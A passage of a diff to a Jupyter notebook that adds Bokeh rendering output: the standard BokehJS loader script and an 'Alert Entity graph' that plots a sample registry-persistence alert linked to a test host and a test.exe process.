handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1430\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1430\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"a6d0234a-ef53-4f46-99d9-57917ee6c826\" data-root-id=\"1431\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"571c46d9-a428-4364-b000-affd930bf7aa\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"1442\"}],\"center\":[{\"id\":\"1445\"},{\"id\":\"1449\"},{\"id\":\"1481\"},{\"id\":\"1482\"},{\"id\":\"1483\"}],\"height\":800,\"left\":[{\"id\":\"1446\"}],\"renderers\":[{\"id\":\"1466\"}],\"title\":{\"id\":\"1432\"},\"toolbar\":{\"id\":\"1457\"},\"width\":800,\"x_range\":{\"id\":\"1434\"},\"x_scale\":{\"id\":\"1438\"},\"y_range\":{\"id\":\"1436\"},\"y_scale\":{\"id\":\"1440\"}},\"id\":\"1431\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"1542\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"1455\",\"type\":\"HelpTool\"},{\"attributes\":{\"overlay\":{\"id\":\"1456\"}},\"id\":\"1452\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1450\",\"type\":\"PanTool\"},{\"attributes\":{\"data_source\":{\"id\":\"1468\"},\"glyph\":{\"id\":\"1476\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"1470\"}},\"id\":\"1469\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1447\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"1543\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"text\":\"Alert: Windows registry persistence method detected\",\"text_font_size\":\"10pt\",\"x\":1.9793461827919983,\"x_offset\":5,\"y\":0.5716718456367739,\"y_offset\":5},\"id\":\"1481\",\"type\":\"Label\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"field\":\"node_color\"},\"size\":{\"value\":25}},\"id\":\"1476\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"1537\",\"type\":\"NodesOnly\"},{\"attributes\":{},\"id\":\"1440\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1454\",\"type\":\"ResetTool\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"1450\"},{\"id\":\"1451\"},{\"id\":\"1452\"},{\"id\":\"1453\"},{\"id\":\"1454\"},{\"id\":\"1455\"},{\"id\":\"1464\"}]},\"id\":\"1457\",\"type\":\"Toolbar\"},{\"attributes\":{\"axis\":{\"id\":\"1446\"},\"dimension\":1,\"ticker\":null},\"id\":\"1449\",\"type\":\"Grid\"},{\"attributes\":{\"formatter\":{\"id\":\"1530\"},\"major_label_policy\":{\"id\":\"1529\"},\"ticker\":{\"id\":\"1447\"}},\"id\":\"1446\",\"type\":\"LinearAxis\"},{\"attributes\":{\"edge_renderer\":{\"id\":\"1473\"},\"inspection_policy\":{\"id\":\"1536\"},\"layout_provider\":{\"id\":\"1475\"},\"node_renderer\":{\"id\":\"1469\"},\"selection_policy\":{\"id\":\"1537\"}},\"id\":\"1466\",\"type\":\"GraphRenderer\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"1436\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1546\",\"type\":\"Selection\"},{\"attributes\":{\"graph_layout\":{\"Alert: Windows registry persistence method detected\":[1.9793461827919983,0.5716718456367739],\"TESTHOST\":[-1.4847554323457248,1.4283281543632267],\"test.exe\":[-0.49459075044627215,-2.0]}},\"id\":\"1475\",\"type\":\"StaticLayoutProvider\"},{\"attributes\":{},\"id\":\"1453\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"1547\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"data_source\":{\"id\":\"1472\"},\"glyph\":{\"id\":\"1471\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"1474\"}},\"id\":\"1473\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"data\":{\"color\":[\"orange\",\"green\",\"green\"],\"description\":[\"Windows registry persistence method detected (2018-09-27 16:59:16) TESTHOST\",\"TESTHOST.DOM.CONTOSO.COM (OSFamily.Windows)\",null],\"end_time\":[\"2018-09-27 16:59:16\",null,null],\"entitytype\":[\"alert\",\"host\",\"process\"],\"index\":[\"Alert: Windows registry persistence method detected\",\"TESTHOST\",\"test.exe\"],\"name\":[\"Windows registry persistence method detected\",\"TESTHOST\",\"test.exe\"],\"node_color\":[\"orange\",\"green\",\"green\"],\"node_type\":[\"alert\",\"entity\",\"entity\"],\"source\":[\"{ 'AdditionalData': { 'AgentId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',\\n                      'AzureResourceId': None,\\n                      'AzureResourceSubscriptionId': None,\\n                      'ConfidenceLevel': 'Unknown',\\n                      'ConfidenceReasons': None,\\n                      'ConfidenceScore': None,\\n                      'ExtendedLinks': None,\\n                      'ExtendedProperties': {'resourceType': 'Non-Azure Resource'},\\n                      'Intent': 'Persistence',\\n                      'IsIncident': False,\\n                      'ProviderAlertId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',\\n                      'SourceComputerId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',\\n                      'SystemSource': 'Non-Azure',\\n                      'TenantId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',\\n                      'TimeGeneratedUtc': '2018-09-27 16:59:47',\\n                      'WorkspaceId': 'b6329e79-0a94-4035-beee-c2e2657b71e3',\\n                      'WorkspaceResourceGroup': 'test-east-us',\\n                      'WorkspaceSubscriptionId': 'b6329e79-0a94-4035-beee-c2e2657b71e3'},\\n  'AlertType': 'RegistryPersistence',\\n  'CompromisedEntity': 'TESTHOST',\\n  'DisplayName': 'Windows registry persistence method detected',\\n  'EndTimeUtc': '2018-09-27 16:59:16',\\n  'Entities': [ Host(DnsDomain=DOM.CONTOSO.COM, NTDomain=DOM, HostName=TESTHOST, NetBiosName=TESTHOST...),\\n                Process(ProcessId=0x940, CreationTimeUtc=0001-01-01 00:00:00, ImageFile=test.exe, Host={...)],\\n  'ProviderName': 'Detection',\\n  'Severity': 'Low',\\n  'StartTimeUtc': '2018-09-27 16:59:16',\\n  'SystemAlertIds': ['2518642332435550951_b6329e79-0a94-4035-beee-c2'],\\n  'Type': 'alerts',\\n  'VendorName': 'Microsoft',\\n  'edges': set()}\",\"{ 'AdditionalData': {},\\n  'DnsDomain': 'DOM.CONTOSO.COM',\\n  'HostName': 'TESTHOST',\\n  'IsDomainJoined': True,\\n  'NTDomain': 'DOM',\\n  'NetBiosName': 'TESTHOST',\\n  'OSFamily': <OSFamily.Windows: 1>,\\n  'Type': 'host',\\n  'edges': set()}\",\"{ 'AdditionalData': {},\\n  'CommandLine': '',\\n  'CreationTimeUtc': datetime.datetime(1, 1, 1, 0, 0),\\n  'Host': { 'AdditionalData': {},\\n            'DnsDomain': 'DOM.CONTOSO.COM',\\n            'HostName': 'TESTHOST',\\n            'IsDomainJoined': True,\\n            'NTDomain': 'DOM',\\n            'NetBiosName': 'TESTHOST',\\n            'OSFamily': <OSFamily.Windows: 1>,\\n            'Type': 'host',\\n            'edges': {Edge(name=Host}},\\n  'ImageFile': 'test.exe',\\n  'ProcessId': '0x940',\\n  'Type': 'process',\\n  'edges': {Edge(name=Host}}\"],\"start_time\":[\"2018-09-27 16:59:16\",null,null],\"time_generated\":[null,null,null]},\"selected\":{\"id\":\"1546\"},\"selection_policy\":{\"id\":\"1547\"}},\"id\":\"1468\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"text\":\"Alert Entity graph\"},\"id\":\"1432\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"1530\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"axis\":{\"id\":\"1442\"},\"ticker\":null},\"id\":\"1445\",\"type\":\"Grid\"},{\"attributes\":{\"source\":{\"id\":\"1472\"}},\"id\":\"1474\",\"type\":\"CDSView\"},{\"attributes\":{\"source\":{\"id\":\"1468\"}},\"id\":\"1470\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1451\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"node_type\",\"@node_type\"],[\"name\",\"@name\"],[\"description\",\"@description\"],[\"entitytype\",\"@entitytype\"]]},\"id\":\"1464\",\"type\":\"HoverTool\"},{\"attributes\":{\"text\":\"TESTHOST\",\"text_font_size\":\"10pt\",\"x\":-1.4847554323457248,\"x_offset\":5,\"y\":1.4283281543632267,\"y_offset\":5},\"id\":\"1482\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"1471\",\"type\":\"MultiLine\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"1434\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1548\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1443\",\"type\":\"BasicTicker\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"1456\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"data\":{\"end\":[\"TESTHOST\",\"test.exe\",\"test.exe\"],\"start\":[\"Alert: Windows registry persistence method detected\",\"Alert: Windows registry persistence method detected\",\"TESTHOST\"]},\"selected\":{\"id\":\"1548\"},\"selection_policy\":{\"id\":\"1549\"}},\"id\":\"1472\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"text\":\"test.exe\",\"text_font_size\":\"10pt\",\"x\":-0.49459075044627215,\"x_offset\":5,\"y\":-2.0,\"y_offset\":5},\"id\":\"1483\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"1536\",\"type\":\"NodesOnly\"},{\"attributes\":{\"formatter\":{\"id\":\"1543\"},\"major_label_policy\":{\"id\":\"1542\"},\"ticker\":{\"id\":\"1443\"}},\"id\":\"1442\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1529\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"1549\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1438\",\"type\":\"LinearScale\"}],\"root_ids\":[\"1431\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.3\"}};\n  var render_items = [{\"docid\":\"571c46d9-a428-4364-b000-affd930bf7aa\",\"root_ids\":[\"1431\"],\"roots\":{\"1431\":\"a6d0234a-ef53-4f46-99d9-57917ee6c826\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1431"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'1431', <span id=\"1673\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[LinearAxis(id='1442', ...)],</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='1445', ...), Grid(id='1449', ...), Label(id='1481', ...), Label(id='1482', ...), Label(id='1483', ...)],</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;800,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[LinearAxis(id='1446', ...)],</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;'#e5e5e5',</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GraphRenderer(id='1466', ...)],</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='1432', ...),</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='1457', ...),</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'right',</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div 